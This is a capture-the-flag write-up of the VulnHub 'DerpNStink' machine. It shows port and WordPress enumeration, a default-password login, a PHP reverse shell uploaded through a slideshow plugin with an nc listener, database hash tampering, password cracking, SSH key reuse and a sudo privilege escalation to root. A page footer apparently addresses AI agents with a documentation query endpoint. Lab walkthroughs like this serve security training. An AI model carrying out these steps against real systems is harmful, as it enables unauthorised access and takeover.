> For the complete documentation index, see [llms.txt](https://choochisiang.gitbook.io/report/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://choochisiang.gitbook.io/report/vulnhub/derpnstink.md). # DerpNStink ## Enumeration ### nmap ``` nmap -sC -sV -oA nmap/DNS 192.168.1.116 ``` ``` Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-25 04:37 EDT Nmap scan report for 192.168.1.116 Host is up (0.0017s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA) | 2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA) | 256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA) |_ 256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (ED25519) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) | http-robots.txt: 2 disallowed entries |_/php/ /temporary/ |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: DeRPnStiNK MAC Address: 00:0C:29:7D:91:B5 (VMware) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.06 seconds ``` Let's put the IP to the web browser ![](/files/-M8A-Tc63uSURbQHHd-d) If we go to inspect element and open up all div we can get the first flag ![](/files/-M8AtBYTz53KeFg07TxL) ### Dirb ``` dirb http://192.168.1.116/ ``` ``` ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Mon May 25 04:50:28 2020 URL_BASE: http://192.168.1.116/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.1.116/ ---- ==> DIRECTORY: http://192.168.1.116/css/ + http://192.168.1.116/index.html (CODE:200|SIZE:1298) ==> DIRECTORY: http://192.168.1.116/javascript/ ==> DIRECTORY: http://192.168.1.116/js/ ==> DIRECTORY: http://192.168.1.116/php/ + http://192.168.1.116/robots.txt (CODE:200|SIZE:53) + http://192.168.1.116/server-status (CODE:403|SIZE:293) ==> DIRECTORY: http://192.168.1.116/temporary/ ==> DIRECTORY: http://192.168.1.116/weblog/ ``` We can see at the nmap and dirb scan has `robots.txt`, lets navigate to there ![](/files/-M8A-bpmu9adbWHI9tns) ![](/files/-M8A-nADQayOSMWBS1eW) ![](/files/-M8A-peND3WV5ba3bMAv) As we can see, we don't have permission on `/php` and `/temporary` told us to try harder. We also can see a `/weblog` in the dirb scan. After navigating to there I got an error ![](/files/-M8A0wAF-4zNWFAzVWLH) I navigate to /etc/hosts and add a IP at there ![](/files/-M8A18I_PPouJrFRtDs3) After that refresh the page and we can see a WordPress Blog ![](/files/-M8A1IkPjz5VfQNw2zkx) ### Wpscan ``` wpscan --url http://derpnstink.local/weblog/ --enumerate u,ap --plugins-detection aggressive ``` ``` _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.1 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://derpnstink.local/weblog/ [192.168.1.116] [+] Started: Mon May 25 04:55:03 2020 Interesting Finding(s): [+] Headers | Interesting Entries: | - Server: Apache/2.4.7 (Ubuntu) | - X-Powered-By: PHP/5.5.9-1ubuntu4.22 | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://derpnstink.local/weblog/xmlrpc.php | Found By: Headers (Passive Detection) | Confidence: 100% | Confirmed By: | - Link Tag (Passive Detection), 30% confidence | - Direct Access (Aggressive Detection), 100% confidence | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] http://derpnstink.local/weblog/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://derpnstink.local/weblog/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 4.6.18 identified (Latest, released on 2020-04-29). | Found By: Emoji Settings (Passive Detection) | - http://derpnstink.local/weblog/, Match: '-release.min.js?ver=4.6.18' | Confirmed By: Meta Generator (Passive Detection) | - http://derpnstink.local/weblog/, Match: 'WordPress 4.6.18' [+] WordPress theme in use: twentysixteen | Location: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/ | Last Updated: 2020-03-31T00:00:00.000Z | Readme: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/readme.txt | [!] The version is out of date, the latest version is 2.1 | Style URL: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/style.css?ver=4.6.18 | Style Name: Twenty Sixteen | Style URI: https://wordpress.org/themes/twentysixteen/ | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.3 (80% confidence) | Found By: Style (Passive Detection) | - http://derpnstink.local/weblog/wp-content/themes/twentysixteen/style.css?ver=4.6.18, Match: 'Version: 1.3' [+] Enumerating All Plugins (via Aggressive Methods) Checking Known Locations - Time: 00:02:19 <===================================================> (86907 / 86907) 100.00% Time: 00:02:19 [+] Checking Plugin Versions (via Passive and Aggressive Methods) [i] Plugin(s) Identified: [+] akismet | Location: http://derpnstink.local/weblog/wp-content/plugins/akismet/ | Last Updated: 2020-04-29T13:02:00.000Z | Readme: http://derpnstink.local/weblog/wp-content/plugins/akismet/readme.txt | [!] The version is out of date, the latest version is 4.1.5 | | Found By: Known Locations (Aggressive Detection) | - http://derpnstink.local/weblog/wp-content/plugins/akismet/, status: 200 | | Version: 3.1.11 (100% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://derpnstink.local/weblog/wp-content/plugins/akismet/readme.txt | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - http://derpnstink.local/weblog/wp-content/plugins/akismet/readme.txt [+] slideshow-gallery | Location: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/ | Last Updated: 2019-07-12T13:09:00.000Z | Readme: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt | [!] The version is out of date, the latest version is 1.6.12 | | Found By: Known Locations (Aggressive Detection) | - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/, status: 403 | | Version: 1.4.6 (100% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <=========================================================> (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [+] unclestinky | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] admin | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up [+] Finished: Mon May 25 04:57:36 2020 [+] Requests Done: 86966 [+] Cached Requests: 12 [+] Data Sent: 22.571 MB [+] Data Received: 11.789 MB [+] Memory used: 368.992 MB [+] Elapsed time: 00:02:33 ``` We got 2 plugins and 2 usernames, for the first try, I managed to log in using the username `admin` and password `admin` ![](/files/-M8A48-VH770y56yuUtw) After clicking around, I found out that under manage slides we can edit the slideshow and bottom we can see that we can upload image. So, I decided to upload a shell file. ## Exploitation ### Reverse Shell Go to this page and download the php reverse shell file from [pentestmonkey](http://pentestmonkey.net/tools/web-shells/php-reverse-shell) ![](/files/-M8A8rQguug1Beb06XHW) Change the IP and the port to our machine then we need to set up a listener ``` nc -nlvp 4444 ``` Then we can go to `Manage Slides` ![](/files/-M8A9BFotlq6wQ7zAU_A) And I click `randonx` to edit ![](/files/-M8A9GfV72ePZW9NqC1y) Scroll to the bottom we can see this ![](/files/-M8A9MKJOVlMMww74vgD) ![](/files/-M8A9OdyfjxVHE77aUZU) Upload the reverse shell file. Then go back to the `/weblog` ![](/files/-M8A9XpPMpqKsYgBNXR2) Click the right arrow on the slides until you get a reverse shell! ![](/files/-M8A9hmK2YT5edTOYzmV) And then we can type ``` python -c 'import pty; pty.spawn("/bin/bash")' ``` ![](/files/-M8AB65F6nW4te-tQBf4) When I run `linpeas.sh`, I found mysql username and password. ![](/files/-M8AXPhE_-0Y-RIAMuop) Then we can go `/php/myphpadmin` to log into the MySQL database Then go to wordpress database and go to `wp_users` I found out that the hash is too difficult to crack because of hash, make it easy, I copy the admin hash to replace the `unclestinky` hash ![](/files/-M8AXoO5GHipji0WjZa2) Then we can login into the wordpress again Go to the post, and we will find the second flag. ![](/files/-M8AXxltNJ2zqarz_9GQ) We then go back to the database and go to `mysql` database and go to `user` table. ![](/files/-M8A_KCYqMNmJ9eG0_U6) Then we can take unclestinky password to crack it at [here](https://crackstation.net/) ![](/files/-M8A_FZV7tIsr_ApCvok) We got the password `wedgie57` We then can ssh to the user **stinky** ![](/files/-M8A_l_8LWEbsg6b1-Bl) Then I went to the Desktop folder and I found the third flag! ![](/files/-M8AcAXRKFje0jBKokrS) After that, I went to the `/home` directory, I found out 1 ftp folder ![](/files/-M8AaD31-qV51hM0-d0h) Then, there is a bunch of ssh files inside over each other ![](/files/-M8AaGHia-QN2AHLXWzE) After 7 times of changing directory, we got `key.txt` ![](/files/-M8AaPr59JfMLStF9RaF) It contains RSA private key ![](/files/-M8AaS-q0S10JqMiR6-D) This might a clue on ssh to the user stinky We save the RSA txt to a file called `id_rsa` and put it at `/root/.ssh` ![](/files/-M8AegPqDUo-EXzDGFtP) We can see that the id\_rsa is too open so we need to change the permission type `chmod 700 id_rsa` Then we can ssh into it ``` ssh -i /root/.ssh/id_rsa stinky@192.168.1.116 ``` ![](/files/-M8Af1enPMmbax61wP6i) Then navigate to `/home/Stinky/Documents` we can get a pcap file ![](/files/-M8Agsv7hUdUAHL5rg5M) Transfer it using `nc` to our machine Then analyse the file using `wireshark` ![](/files/-M8AoEfeiNID2L6wbgBn) Then we can follow the TCP stream and this is the password for user mrderp. we then `su` to user `mrderp` Then type `sudo -l` ![](/files/-M8Ao_sU7JxhftpVv51D) ## Privilege Escalation We can see that inside the /home/mrderp we don't have the folder called `binaries`. ![](/files/-M8ArfqLy3Y8T_WE-Z1O) So we need to create one ``` mkdir binaries cd binaries echo "/bin/bash" > derpy.sh chmod 777 derpy.sh sudo /home/mrderp/derpy* ``` ![](/files/-M8AseND0DJfb0blwC8T) Got root ! Navigate to the `/root/Desktop` to get the fourth flag ![](/files/-M8AslmYWD48UKj9q8ql) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://choochisiang.gitbook.io/report/vulnhub/derpnstink.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.